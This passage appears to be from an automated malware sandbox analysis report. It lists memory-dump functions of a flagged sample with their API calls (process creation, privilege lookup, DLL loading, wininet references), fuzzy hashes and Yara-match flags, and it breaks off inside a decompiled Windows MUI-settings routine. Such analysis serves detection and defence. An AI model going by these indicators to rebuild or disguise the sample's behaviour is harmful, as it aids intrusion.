                                                      • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                      • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                      • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 009FFD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.692467198.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                      • Associated: 00000008.00000002.692459553.00000000009E0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692670851.0000000000AD0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692685212.0000000000AE0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692706344.0000000000AE4000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692723406.0000000000AE7000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692734354.0000000000AF0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.693915836.0000000000B50000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                      • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                      • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                      • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 009FFDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.692467198.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                      • Associated: 00000008.00000002.692459553.00000000009E0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692670851.0000000000AD0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692685212.0000000000AE0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692706344.0000000000AE4000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692723406.0000000000AE7000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692734354.0000000000AF0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.693915836.0000000000B50000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                      • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                      • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                      • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 009FFED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.692467198.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                      • Associated: 00000008.00000002.692459553.00000000009E0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692670851.0000000000AD0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692685212.0000000000AE0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692706344.0000000000AE4000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692723406.0000000000AE7000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692734354.0000000000AF0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.693915836.0000000000B50000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                      • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                      • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                      • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 009FFFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.692467198.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                      • Associated: 00000008.00000002.692459553.00000000009E0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692670851.0000000000AD0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692685212.0000000000AE0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692706344.0000000000AE4000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692723406.0000000000AE7000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692734354.0000000000AF0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.693915836.0000000000B50000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                      • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                      • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                      • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00099070, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Sleep.KERNELBASE(000007D0), ref: 00099118
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID: net.dll$wininet.dll
                                                      • API String ID: 3472027048-1269752229
                                                      • Opcode ID: d65eba21659510116b489bbcb7a02bb400bd43ec9c57b198469d48801f1f5de9
                                                      • Instruction ID: ae690c24b2d54aa701aed31fe01376ea77c39d04e7b9f9028838a94dbe95c17f
                                                      • Opcode Fuzzy Hash: d65eba21659510116b489bbcb7a02bb400bd43ec9c57b198469d48801f1f5de9
                                                      • Instruction Fuzzy Hash: A831A4B2500745BBCB24DF68C885FA7B7F8BB48B00F10841DF62E5B245D630B550DBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00099066, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 79sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Sleep.KERNELBASE(000007D0), ref: 00099118
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID: net.dll$wininet.dll
                                                      • API String ID: 3472027048-1269752229
                                                      • Opcode ID: 4cee999c3e47adbc3a6324121d9ccd7df5aa9fde9ce00965a199d8f7176c656b
                                                      • Instruction ID: 83d91cde1d5518385e1bf99baa44e81ae3c4deee0ed94f04b616cf6c234d541f
                                                      • Opcode Fuzzy Hash: 4cee999c3e47adbc3a6324121d9ccd7df5aa9fde9ce00965a199d8f7176c656b
                                                      • Instruction Fuzzy Hash: 6C21A2B1A00605BBCB24DF69C885FABB7B4FB48700F10806DF62D6B246D774A550DBA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0009A620, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(&E,?,00094C9F,00094C9F,?,00094526,?,?,?,?,?,00000000,00000000,?), ref: 0009A64D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID: &E
                                                      • API String ID: 1279760036-928243876
                                                      • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                      • Instruction ID: 8a088229b33f4946db01d4d9f5edee1b46feb3fbd423364f06fad599f45e3bf5
                                                      • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                      • Instruction Fuzzy Hash: 8EE012B2200208ABDB14EF99CC41EA777ACAF88754F118558BA1C5B242C630F9108AF0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0009A660, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083AF8), ref: 0009A68D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID: .z`
                                                      • API String ID: 3298025750-1441809116
                                                      • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                      • Instruction ID: f352061e4f4ddb59be6a1c54e2945e5dd89a75676aa41e9ca420931ccf541349
                                                      • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                      • Instruction Fuzzy Hash: 65E012B2200208ABDB18EF99CC49EA777ACAF88750F018558BA1C5B242C630E9108AF0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0009A5AA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(&E,?,00094C9F,00094C9F,?,00094526,?,?,?,?,?,00000000,00000000,?), ref: 0009A64D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID: &E
                                                      • API String ID: 1279760036-928243876
                                                      • Opcode ID: 0a6d49218b0ff8936ba5e763cf9b06ba93181c814af04d2457e7c09f8305fb33
                                                      • Instruction ID: cf1b76fe21ebd193b9f08b061e9e6431d0b189aca2f84c61d47ac1e07feadcac
                                                      • Opcode Fuzzy Hash: 0a6d49218b0ff8936ba5e763cf9b06ba93181c814af04d2457e7c09f8305fb33
                                                      • Instruction Fuzzy Hash: 73E08CB2A001046BEB20EF558C02FE7375CEF86314F104555FD1C6B242C130E8248AF1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00088310, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0008836A
                                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0008838B
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      • Opcode ID: 3172d27be0b016439e5481d8b21c313a41ffbcab7864ad54bb0489d0eefa33a4
                                                      • Instruction ID: 83599f710148492f4a7c64f6c464cd83381755fa0ebf07c399eff6ba782eb8cf
                                                      • Opcode Fuzzy Hash: 3172d27be0b016439e5481d8b21c313a41ffbcab7864ad54bb0489d0eefa33a4
                                                      • Instruction Fuzzy Hash: 49018F31A8022877EB20B6949C03FFE776C6B41F50F044119FF44BA1C3EAA46A0647E6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0008ACD4, Relevance: 1.6, APIs: 1, Instructions: 89libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0008AD52
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: 40234a8a2d02a7016ed6b1dfa9fb50a2b1cdff91f9250db784d8a5f894bd2bd5
                                                      • Instruction ID: cea4ae686017e0bf44a8e7022660a4234d2a6a78dd0380fdae187420ce6a9610
                                                      • Opcode Fuzzy Hash: 40234a8a2d02a7016ed6b1dfa9fb50a2b1cdff91f9250db784d8a5f894bd2bd5
                                                      • Instruction Fuzzy Hash: 64214835A0814A5BEF21FB54D885EF8BBA1EF12308F084197E888CB652F5739908C792
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00099C33, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlDosPathNameToNtPathName_U.NTDLL(00700069,00000000,00000000,00084A15,00000000,00000000,00700069,?,00083AF8), ref: 00099C71
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Path$NameName_
                                                      • String ID:
                                                      • API String ID: 3514427675-0
                                                      • Opcode ID: fdb62bad89b7ed76f3963de9bef5f91fcc088f9b93b45922cccfd9583994b889
                                                      • Instruction ID: ea69791a71c63aded84097d01e50f60355302bd25be80fbf933aa535da8efb5d
                                                      • Opcode Fuzzy Hash: fdb62bad89b7ed76f3963de9bef5f91fcc088f9b93b45922cccfd9583994b889
                                                      • Instruction Fuzzy Hash: FC015AB1604208ABCF04DF98DC86DEB7BA9EF99354F058599F9099B246D230E8118BB1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0008ACE0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0008AD52
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                      • Instruction ID: 38cca229b08fef25ae33ad19fe51bd56c0552afd15bc57c32e54a395163ddc4f
                                                      • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                      • Instruction Fuzzy Hash: 240171B5E4020DABDF10EBE4DD42FDEB3B8AB54308F0041A5E90997642F670EB14DB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0009A6CD, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0009A724
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateInternalProcess
                                                      • String ID:
                                                      • API String ID: 2186235152-0
                                                      • Opcode ID: 3f184d03a8097b7f8423271d4b501b509d1038ddc8f17935dcad75214cfdadbb
                                                      • Instruction ID: 696844527b8e53a7e969de9ca514451904c056b8edfbd072da4580b67836ba35
                                                      • Opcode Fuzzy Hash: 3f184d03a8097b7f8423271d4b501b509d1038ddc8f17935dcad75214cfdadbb
                                                      • Instruction Fuzzy Hash: 6801AFB2210108AFCB54CF99DC81EEB37A9AF8C354F158258FA1DE7245D630E851CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0009A6D0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0009A724
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateInternalProcess
                                                      • String ID:
                                                      • API String ID: 2186235152-0
                                                      • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                      • Instruction ID: 5a8c08d163474c49547c0f6c35b253b3023fb7b495797746ff9d36dd09641573
                                                      • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                      • Instruction Fuzzy Hash: 0401B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000991A0, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0008F040,?,?,00000000), ref: 000991DC
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateThread
                                                      • String ID:
                                                      • API String ID: 2422867632-0
                                                      • Opcode ID: fae906c78181de7630efb0e23d798c80b6ead711412a0b26827c401ed9c2da1b
                                                      • Instruction ID: 534dd52df73ec83028703d1d2998e606eec88586b204f6ab6263c6a07508276b
                                                      • Opcode Fuzzy Hash: fae906c78181de7630efb0e23d798c80b6ead711412a0b26827c401ed9c2da1b
                                                      • Instruction Fuzzy Hash: 48E06D373903043AE6206599AC02FE7B39C9B81B21F14002AFA0DEB2C2D595F80142A4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00099C40, Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlDosPathNameToNtPathName_U.NTDLL(00700069,00000000,00000000,00084A15,00000000,00000000,00700069,?,00083AF8), ref: 00099C71
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Path$NameName_
                                                      • String ID:
                                                      • API String ID: 3514427675-0
                                                      • Opcode ID: 991622dfa8962ad2ab0fbcb377ea20e9540ada2c14e034a2f5a96e5b281a6e83
                                                      • Instruction ID: 1e79cee6634a7e85489e5ce1719c39a24ee2608bf1f13fb00772e6a178f97bba
                                                      • Opcode Fuzzy Hash: 991622dfa8962ad2ab0fbcb377ea20e9540ada2c14e034a2f5a96e5b281a6e83
                                                      • Instruction Fuzzy Hash: 63E01AB6600208AFCB14DF88CC85EE77BACEF88754F008458BA1C97242C670F9108BF0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0009A7B4, Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,0008F1C2,0008F1C2,?,00000000,?,?), ref: 0009A7F0
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LookupPrivilegeValue
                                                      • String ID:
                                                      • API String ID: 3899507212-0
                                                      • Opcode ID: ae9efab96a5b923ab8d316b95595889d8be8f103b421966385523d891eef0275
                                                      • Instruction ID: 55dcfe6960030c2df01dba447c89608974f31b69251d5a4143be254743b37477
                                                      • Opcode Fuzzy Hash: ae9efab96a5b923ab8d316b95595889d8be8f103b421966385523d891eef0275
                                                      • Instruction Fuzzy Hash: 45E06DB26002046FDB20DF95CC80EE737A99F89250F008255FA4D97342C531E8058BB1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0009A7C0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,0008F1C2,0008F1C2,?,00000000,?,?), ref: 0009A7F0
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LookupPrivilegeValue
                                                      • String ID:
                                                      • API String ID: 3899507212-0
                                                      • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                      • Instruction ID: a92b5ab591dca3b64831b5d8c6ffd47efd980b144ce5bea2ea68f664a5e3be9a
                                                      • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                      • Instruction Fuzzy Hash: 25E01AB16002086BDB10DF89CC85EE737ADAF89750F018164BA0C57242C930E8108BF5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0008F6C0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNELBASE(00008003,?,00088D14,?), ref: 0008F6EB
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorMode
                                                      • String ID:
                                                      • API String ID: 2340568224-0
                                                      • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                      • Instruction ID: 3a9551da0c4a7b9e66d5b9c056bebd853aa90ba30bee5ab33ec0e55d291aeccc
                                                      • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                      • Instruction Fuzzy Hash: E9D0A9767903083BEA10FAA89C03F7633CCAB44B04F490074FA88EB3C3E964E8018265
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Function 00A28788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 94%
                                                      			E00A28788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E00A28460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E00A0E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E00A2718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E00A28460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E00A0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E00A2718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E00A28460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E00A28460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E00A28460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E00A0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E00A0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E00A2718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E00A0E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E00A02340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E00A1E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E00A0E2A8(_t322,  &_v68, _v16);
								if(E00A25553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E00A1E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E00A0E2A8(_t322,  &_v68, _t236);
								if(E00A25553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E00A0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E00A0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E00A2718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E00A0E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E00A02340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E00A1E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E00A0E2A8(_v12,  &_v68, _v16);
							if(E00A25553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E00A1E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E00A0E2A8(_t322,  &_v68, _t269);
